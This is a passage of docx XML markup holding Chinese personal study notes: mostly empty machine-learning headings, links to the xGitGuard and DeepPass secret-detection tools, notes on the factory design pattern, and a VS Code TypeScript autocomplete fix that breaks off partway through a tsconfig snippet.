      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0125FB9C" w14:textId="29323D28" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0760E4D4" w14:textId="77777777" w:rsidR="00A40C6E" w:rsidRPr="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D869790" w14:textId="26D7A377" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="811" w:name="_Toc159780232"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（七）迁移学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="811"/>
    </w:p>
    <w:p w14:paraId="39A6CE9E" w14:textId="4F515AB0" w:rsidR="00CA3E09" w:rsidRDefault="00CA3E09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F11033A" w14:textId="4AB5BA7C" w:rsidR="00CA3E09" w:rsidRDefault="00CA3E09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C00EF9" w14:textId="77777777" w:rsidR="00CA3E09" w:rsidRPr="00CA3E09" w:rsidRDefault="00CA3E09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560B51BE" w14:textId="6B75DB64" w:rsidR="00702652" w:rsidRDefault="00702652" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="812" w:name="_Toc159780233"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（八）模型保存与可视化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="812"/>
    </w:p>
    <w:p w14:paraId="3402D246" w14:textId="3B0B3DD3" w:rsidR="005B6C3C" w:rsidRDefault="005B6C3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394F998D" w14:textId="77777777" w:rsidR="00CA3E09" w:rsidRDefault="00CA3E09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A99C954" w14:textId="2582ECE0" w:rsidR="00702652" w:rsidRDefault="00702652" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="813" w:name="_Toc159780234"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（九）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tensor</w:t>
      </w:r>
      <w:r>
        <w:t>board</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可视化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="813"/>
    </w:p>
    <w:p w14:paraId="02D06746" w14:textId="77777777" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBBF953" w14:textId="77777777" w:rsidR="00AC4C3B" w:rsidRDefault="00AC4C3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25462C85" w14:textId="2DC39631" w:rsidR="00C477C0" w:rsidRDefault="00BC2A02" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="814" w:name="_Toc159780235"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥给的两个模型</w:t>
      </w:r>
      <w:r w:rsidR="00BD4154">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BD4154">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xG</w:t>
      </w:r>
      <w:r w:rsidR="00BD4154">
        <w:t>itGuard</w:t>
      </w:r>
      <w:r w:rsidR="00BD4154">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00BD4154">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DeepPass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="814"/>
    </w:p>
    <w:p w14:paraId="39544ECF" w14:textId="3EB4236B" w:rsidR="00C477C0" w:rsidRDefault="00BD4154" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C227E">
        <w:t>xGitGuard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB49FC1" w14:textId="2C255A24" w:rsidR="00C477C0" w:rsidRDefault="004C227E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C227E">
        <w:t>https://github.com/Comcast/xGitGuard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C13F87" w14:textId="77AED723" w:rsidR="00C477C0" w:rsidRDefault="00C477C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0980434B" w14:textId="7013C15E" w:rsidR="00C477C0" w:rsidRDefault="00BD4154" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C227E">
        <w:t>DeepPass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24449A47" w14:textId="70DED2B0" w:rsidR="00C477C0" w:rsidRDefault="004C227E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C227E">
        <w:t>https://github.com/GhostPack/DeepPass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346AB4C9" w14:textId="7CA64B9F" w:rsidR="00080FAB" w:rsidRDefault="00080FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA90FD8" w14:textId="5BEC349B" w:rsidR="00C22717" w:rsidRDefault="00C22717" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="815" w:name="_Toc159780236"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>花书学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="815"/>
    </w:p>
    <w:p w14:paraId="2EBF074E" w14:textId="77777777" w:rsidR="00C22717" w:rsidRDefault="00C22717" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A114B28" w14:textId="0E9983FF" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="816" w:name="_Toc159780237"/>
      <w:r>
        <w:t>设计模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="816"/>
    </w:p>
    <w:p w14:paraId="0834A3FA" w14:textId="77777777" w:rsidR="00C22717" w:rsidRDefault="00C22717" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B045D96" w14:textId="3BE8AA86" w:rsidR="00C22717" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00835A02" w14:textId="61CED8AB" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00807EBE">
        <w:t>https://www.runoob.com/design-pattern/factory-pattern.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17A287" w14:textId="77777777" w:rsidR="00C22717" w:rsidRDefault="00C22717" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E14671" w14:textId="7436791D" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="817" w:name="_Toc159780238"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工厂模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="817"/>
    </w:p>
    <w:p w14:paraId="34867745" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C284320" w14:textId="0478DDCB" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接看代码较为好懂，我认为鹏哥写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基线扫描程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是工厂模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3603BEBE" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AD4954" w14:textId="030104B4" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先声明一个接口类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shape</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义接口方法</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该接口，并重写接口方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4ABEBE" w14:textId="051E385D" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现它的类类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会出现类型错误，两者可相同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049204CF" w14:textId="14DBBAD3" w:rsidR="00807EBE" w:rsidRPr="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>implement)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类型，可以被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00807EBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Shape.</w:t>
      </w:r>
      <w:r w:rsidRPr="00807EBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>成员方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来接受和调用类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4ED56" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE58D81" w14:textId="4ED07478" w:rsidR="00807EBE" w:rsidRDefault="00470CA6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="818" w:name="_Toc159780239"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>抽象工厂模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="818"/>
    </w:p>
    <w:p w14:paraId="3960DD43" w14:textId="77777777" w:rsidR="00470CA6" w:rsidRDefault="00470CA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4811D64F" w14:textId="77777777" w:rsidR="00470CA6" w:rsidRPr="00470CA6" w:rsidRDefault="00470CA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D725BDC" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273B0A7F" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0E827B" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRPr="00C22717" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB06215" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAF785A" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A8DB6E" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F6D06C" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA68152" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRPr="00C22717" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABC0892" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62984DAB" w14:textId="77777777" w:rsidR="00807EBE" w:rsidRDefault="00807EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E02A964" w14:textId="77777777" w:rsidR="00C22717" w:rsidRPr="00C22717" w:rsidRDefault="00C22717" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B01357" w14:textId="783FF64A" w:rsidR="00080FAB" w:rsidRDefault="00080FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D87828" w14:textId="3386795D" w:rsidR="004B783B" w:rsidRDefault="004B783B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EAAEAA" w14:textId="6E3B8D57" w:rsidR="004B783B" w:rsidRDefault="004B783B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F70588" w14:textId="66F0E76D" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="819" w:name="_Toc159780240"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r>
        <w:t>调试技巧</w:t>
      </w:r>
      <w:bookmarkEnd w:id="819"/>
    </w:p>
    <w:p w14:paraId="54A37B58" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB6FCA3" w14:textId="06FEACCE" w:rsidR="002C38D2" w:rsidRPr="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="820" w:name="_Toc159780241"/>
      <w:r w:rsidRPr="002C38D2">
        <w:t>App.vue Doctor Bad TypeScript version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="820"/>
    </w:p>
    <w:p w14:paraId="7DAA3DC9" w14:textId="77777777" w:rsidR="004B783B" w:rsidRDefault="004B783B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B282364" w14:textId="03B453F5" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看了下原因，大概就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -- 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本有导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动补全失效的问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一直报这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，很烦</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF89ED" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25387CAB" w14:textId="5C386FA4" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局安装最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="004C4860">
        <w:t>typescript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6152C" w14:textId="3CBEC4E0" w:rsidR="002C38D2" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C4860">
        <w:t>npm install -g typescript@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7408FF" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4032CC5A" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A49E14" w14:textId="616E34C6" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="821" w:name="_Toc159780242"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误思路</w:t>
      </w:r>
      <w:bookmarkEnd w:id="821"/>
    </w:p>
    <w:p w14:paraId="1AD8E4C5" w14:textId="36AD16FA" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找当前项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tsconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加如下一行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9D3EF" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD43724" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "compilerOptions": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71542635" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C4860">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"typescript": "C:/Users/ranja/AppData/Roaming/npm/node_modules/typescript",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AC00E" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "target": "es6",</w:t>
